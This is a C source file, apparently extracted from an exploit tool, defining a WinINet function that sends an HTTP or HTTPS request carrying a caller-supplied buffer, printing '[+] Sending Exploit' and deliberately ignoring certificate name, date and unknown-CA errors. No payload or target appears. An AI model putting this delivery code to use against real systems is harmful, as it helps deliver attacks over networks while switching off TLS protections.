
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_1__ ;


typedef int dwFlags ;
typedef int bufQuery ;
struct TYPE_4__ {int dwReturnCode; int dwBytesRead; char* buffer; } ;
typedef char TCHAR ;
typedef TYPE_1__* PHTTPData ;
typedef int LPVOID ;
typedef int HTTPData ;
typedef int * HINTERNET ;
typedef int DWORD ;
typedef scalar_t__ BOOL ;


 int GetLastError () ;
 int HTTP_QUERY_CONTENT_LENGTH ;
 int HTTP_QUERY_STATUS_CODE ;
 int * HttpOpenRequest (int *,char*,char*,int *,int *,int *,int,int ) ;
 scalar_t__ HttpQueryInfo (int *,int ,char*,int*,int *) ;
 int HttpSendRequest (int *,char*,int,char*,int) ;
 int INTERNET_FLAG_IGNORE_CERT_CN_INVALID ;
 int INTERNET_FLAG_IGNORE_CERT_DATE_INVALID ;
 int INTERNET_FLAG_RELOAD ;
 int INTERNET_FLAG_SECURE ;
 int INTERNET_OPEN_TYPE_PRECONFIG ;
 int INTERNET_OPTION_SECURITY_FLAGS ;
 int INTERNET_SERVICE_HTTP ;
 int InternetCloseHandle (int *) ;
 int * InternetConnect (int *,char*,int,int *,int *,int ,int ,int) ;
 int * InternetOpen (char*,int ,int *,int *,int ) ;
 int InternetQueryOption (int *,int ,int ,int*) ;
 scalar_t__ InternetReadFile (int *,char*,int,int*) ;
 int InternetSetOption (int *,int ,int*,int) ;
 int SECURITY_FLAG_IGNORE_UNKNOWN_CA ;
 scalar_t__ atol (char*) ;
 void* malloc (int) ;
 int memset (TYPE_1__*,int ,int) ;
 int printf (char*,...) ;
 int strlen (char*) ;

PHTTPData MakeHTTPRequest(char *host, DWORD port, char *metod,char *Url,int ssl, char *buffer) {

    HINTERNET hInternetSession,hConnect,hRequest;
    static TCHAR hdrs[] = "Content-Type: application/x-www-form-urlencoded";
    int ret;
    PHTTPData resultado;
    char bufQuery[32] ;
    DWORD dwBuffLen,dwFlags;
    BOOL bQuery,bRead;
    DWORD dwHTTPCode,dwIndex,dwFileSize,dwReadedBytes,dwLengthBufQuery = sizeof(bufQuery);



    resultado=malloc(sizeof(HTTPData));
    memset(resultado,0,sizeof(HTTPData));

    if ((hInternetSession = InternetOpen ("TigerTeam 514",INTERNET_OPEN_TYPE_PRECONFIG,((void*)0),((void*)0),0)) == ((void*)0)) {
        return (resultado);
    }
    hConnect = InternetConnect(hInternetSession,host,port,((void*)0),((void*)0),INTERNET_SERVICE_HTTP,0,1);
    if (!ssl) {
        hRequest = HttpOpenRequest(hConnect,
        metod,Url,((void*)0),((void*)0),((void*)0),INTERNET_FLAG_RELOAD,0);
    } else {
        hRequest = HttpOpenRequest(hConnect,
            metod,Url,((void*)0),((void*)0),((void*)0),
            INTERNET_FLAG_IGNORE_CERT_CN_INVALID |INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID ,0);
    }

    if (hRequest==((void*)0)) {
        printf("error chungo en HttpOpenRequest\n");
        return(resultado);
    }

    if (buffer==((void*)0)) {
            ret = HttpSendRequest(hRequest,hdrs,strlen(hdrs),((void*)0),0);
    } else {
            printf("[+] Sending Exploit ( %i bytes)\n",strlen(buffer));
            ret = HttpSendRequest(hRequest,hdrs,strlen(hdrs),buffer,strlen(buffer));

    if ((!ret) && (ssl) ){
            dwBuffLen = sizeof(dwFlags);
            printf("[+] Ignoring unknown CA...\n");
            InternetQueryOption (hRequest, INTERNET_OPTION_SECURITY_FLAGS,
                (LPVOID)&dwFlags, &dwBuffLen);
            dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
            InternetSetOption (hRequest, INTERNET_OPTION_SECURITY_FLAGS,
                &dwFlags, sizeof (dwFlags) );
            printf("[+] Sending Exploit ( %i bytes)\n",strlen(buffer));
            ret = HttpSendRequest(hRequest,hdrs,strlen(hdrs),buffer,strlen(buffer));
        }


        if (!ret) {
            printf("Se ha enviado mal la peticion HTTP: %i\n",GetLastError());
            return(resultado);
        }
    }
        bQuery= HttpQueryInfo(hRequest,HTTP_QUERY_STATUS_CODE,bufQuery,&dwLengthBufQuery,((void*)0));
        if (!bQuery) {
            printf("Control de Errores - bQuery Vale NULL\n");
            return(resultado);
        }
        resultado->dwReturnCode = (DWORD)atol(bufQuery) ;


        dwLengthBufQuery=sizeof(bufQuery);
        bQuery= HttpQueryInfo(hRequest,
                HTTP_QUERY_CONTENT_LENGTH,
                bufQuery,
                &dwLengthBufQuery,
                ((void*)0));
        dwFileSize = (DWORD)atol(bufQuery) ;

        resultado->dwBytesRead=dwFileSize;
        if (dwFileSize==0) {
            resultado->buffer=((void*)0);
            InternetCloseHandle(hRequest);
            InternetCloseHandle(hConnect);
            InternetCloseHandle(hInternetSession);
            return(resultado);
        }
        resultado->buffer= malloc(dwFileSize+1);
        bRead = InternetReadFile(hRequest,
                resultado->buffer,
                dwFileSize,
                &dwReadedBytes);
        resultado->buffer[resultado->dwBytesRead] = '\0' ;

    InternetCloseHandle(hRequest);
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternetSession);
    return(resultado);
}
